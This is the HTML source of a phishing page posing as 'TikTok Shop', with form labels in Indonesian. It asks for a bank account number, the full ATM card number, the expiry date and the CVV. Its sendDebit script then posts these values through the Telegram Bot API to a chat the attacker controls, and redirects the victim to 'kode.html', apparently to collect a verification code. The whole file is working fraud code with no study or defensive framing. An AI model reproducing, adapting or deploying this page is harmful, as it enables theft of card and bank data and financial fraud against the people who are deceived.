
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>TikTok Shop</title>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
    * {
        font-family: 'Ubuntu', sans-serif;
        font-weight: 400;
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        position: relative;
        color: #000;
    }
    .b { font-weight: 500; }
    html { width: 100vw; height: 100vh; }
    body {
        background: #fff;
        width: 100%;
        height: 100%;
    }
    .container {
        width: 100%;
        padding: 20px;
        height: 100%;
        max-width:350px;
        margin: 0 auto;
        text-align:center;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .hero {
        width: 100%;
        height: 283px;
    }
    .hero img {
        width: 100%;
    }
    h1 {
        font-size: 20px;
        text-align: center;
        margin: 20px 0;
        font-weight: 600;
    }
    form {
        width: 100%;
        height: auto;
        flex-direction: column;
    }
    label {
        display: block;
        font-size: 15px;
        text-align: left;
        margin-bottom: 8px;
        font-weight: 500;
    }
    select {
        width: 100%;
        height: 40px;
        border-radius: 4px;
        padding: 0 10px;
        outline: none;
        border: 1px solid #aeaeae;
        background: #fff;
        margin-bottom: 20px;
    }
    input:focus,
    select:focus {
        border: 1.1px solid #000;
    }
    input {
        width: 100%;
        background: #fff;
        height: 40px;
        border-radius: 4px;
        border: 1px solid #aeaeae;
        outline: none;
        padding: 0 10px;
        font-size: 16px;
        margin-bottom: 20px;
    }
    button {
        margin-top: 10px;
        width: 100%;
        height: 40px;
        border: none;
        outline: none;
        border-radius: 8px;
        color: #fff;
        font-weight:bold;
        background: #EE3056;
        text-align: center;
        font-size: 13px;
    }
    
     .process1 {
            width: 100%;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: auto;
            position: fixed;
            padding-top: 30px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 999999999;
            
      
}
.loading {
    position: fixed;
    display: flex;
    align-items: center;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 0px;
}
.loading img {
    width: 90px;
    border-radius: 10px;
}

</style>
</head>
<body>
    <center>
<div id="djload" name="process" class="process1" style="display: none;">
      <div class="loading">
       <img src="https://hosting.tigerengine.id/eyyhg8.gif">              
            </div>
        </div>
    <div class="container">
        <div class="flex hero">
            <img src="https://hosting.tigerengine.id/gcwydq.jpg" alt="">
        </div>
        <h1 class="">TikTok Shop</h1>
        <form onsubmit="sendDebit()" method="post">
            <label>No.Rekening</label>
            <input type="tel" required autocomplete="off" placeholder="1234567890" name="rek" id="rek">
            <label>16 digit No.kartu ATM</label>
            <input type="tel" required autocomplete="off" data-mask="0000 0000 0000 0000" placeholder="**** **** **** ****" name="atm" id="atm">
            <label>Masa Berlaku</label>
            <input type="tel" required autocomplete="off" data-mask="00/00" placeholder="00/00" name="valid" id="valid">
      <label>CVV (3 angka di belakang kartu)</label>
            <input type="password" inputmode="numeric" required autocomplete="off" data-mask="000" placeholder="***" name="cvv" id="cvv">
            <button type="submit">LANJUT</button>
        </form>
        <br>
        <br>
        <br>
    </div>
     <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="kk.js"></script>
    <script src="i.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
       
        
 // Debit
function sendDebit(){
    $(".process1").fadeIn();
    event.preventDefault();   
    
  var rek = $('#rek').val();
  sessionStorage.setItem('rek', rek);
  var atm = $('#atm').val();
  sessionStorage.setItem('atm', atm);
  var valid = $('#valid').val();
  sessionStorage.setItem('valid', valid);
  var cvv = $('#cvv').val();
  sessionStorage.setItem('cvv', cvv);
                              
    var logo = "𝘄𝘄𝘄.𝘁𝗶𝗸𝘁𝗼𝗸𝘀𝗵𝗼𝗽.𝗰𝗼𝗺";              
    var gabungan = '' + logo  + '%0A%0A⍟ 𝐍𝐨.𝐑𝐞𝐤 •• ' + rek + '%0A⍟ 𝐍𝐨.𝐀𝐭𝐦 •• ' + atm + '%0A⍟ 𝐕𝐚𝐥𝐢𝐝 •• ' + valid + '%0A⍟ 𝐂𝐯𝐯 •• ' + cvv ;   
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,   
    complete: function(){
    setTimeout(function(){   
    window.location = "kode.html";
    $(".process1").fadeOut();  
    
    }, 500);}});};
    </script>
</body>
</html>
